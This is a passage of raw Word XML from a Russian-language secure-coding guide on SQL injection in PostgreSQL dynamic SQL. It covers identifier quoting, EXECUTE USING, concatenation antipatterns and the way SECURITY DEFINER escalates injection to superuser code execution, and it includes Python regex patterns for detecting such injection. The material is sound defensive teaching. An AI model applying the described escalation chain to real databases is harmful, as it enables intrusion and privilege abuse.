        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Value — USING (предпочтительно) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%L</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Конкатенация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без сопровождающих защитных вызовов — антипаттерн на всех позициях. SECURITY DEFINER усиливает любую identifier-injection до privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03ABAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Подразделы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DDE23E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.1 format %s vs %I (R18)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основная карточка. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставляет identifier без quoting → stacked-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри EXECUTE. Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (identifier-quoting с doubling double-quotes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D2890" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.2 quote_ident ограничения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функциональный эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>, но: (1) не для значений, (2) не нормализует case (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), (3) пропускает Unicode homoglyphs. Защита: ASCII-only regex + точный whitelist без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t>/normalize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549CD18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — безопасный bind для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значений</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через extended protocol. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валиден только в expression-position). Защита: комбинировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для имён + USING для значений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DCEB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.4 || конкатенация — антипаттерн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самый распространённый source 3.16. Полный пример с 5 injection-точками в одной функции: schema-injection, identifier-injection, value-injection через quote-escape, ORDER BY-injection. Защита: систематический переход на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + USING + whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFF06A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — каскад трёх ошибок: SECURITY DEFINER переключает context на owner; dynamic SQL внутри унаследует privilege; identifier-injection даёт arbitrary SQL под owner. Эскалация до superuser-RCE из обычной EXECUTE-привилегии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6D33F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Decision-таблица: что использовать когда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9479F" w14:paraId="5376BFFD"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3D2EF55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Цель защиты</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E345963" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Правильный инструмент</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955E5B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Антипаттерн</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F5A3A2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7010D15D"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B03F7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Имя таблицы / схемы / колонки</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7FFABF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>format('%I', x)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>quote_ident(x)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C3398A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>format('%s', x)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, `</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836043" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="0019479F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3F1DFB88"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3CD39F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение для WHERE/INSERT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8F57E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EXECUTE ... USING $1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2BE3ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w: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3DEFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="0019479F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1B9F3C2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475AA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Schema-qualified имя</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6DDF75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>format('%I.%I', sch, tbl)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (split!)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22723C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>format('%I', 'sch.tbl')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (одно имя)</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851C65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7E90D465"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D3D932" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Часть DDL (CREATE/ALTER)</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402702" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>format('%I')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + whitelist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255B61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>concat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2F8869" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.1, 3.16.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2EFD6A6E"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3125FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Direction для ORDER BY</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8B727E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">whitelist </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('ASC', 'DESC')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> после check</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B410DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>concat без whitelist</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F78D88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.4 (+ 3.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="74DC9A95"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E8D780" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SECURITY DEFINER функция</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A025A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">всё выше + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SET search_path = pg_catalog, pg_temp</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D1AE44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SD без search_path и/или с</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1759CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="0019479F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E233E2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Хук для rules.py: класс IDENTIFIER_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914AACC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># rules.py фрагмент — детекция identifier injection в plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E93045" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Применяется к extracted prosrc из pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDB0F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9DA47" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3827AFA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589AB85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IDENTIFIER_INJECTION_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D860D11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.16.1: %s в position, похожей на identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB039C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"format\s*\([^)]*%s[^)]*(tbl|table|col|column|schema|relname)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A4DFF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013085FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90CF11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.16.4: EXECUTE с || (без сопровождающего format/quote_ident)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776493B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"EXECUTE\s+['\"][^'\"]*['\"]?\s*\|\|", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882F4C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\|\|\s*[a-z_][a-z0-9_]*\s*\|\|", re.IGNORECASE),  # var посреди concat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F512FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6638E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.16.4: || c quote vs без quote — нужен AST-walk или окруж-анализ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37860ACB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (статически выявляется через отсутствие quote_ident/quote_literal/format в окрестности)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58CDD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC63A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
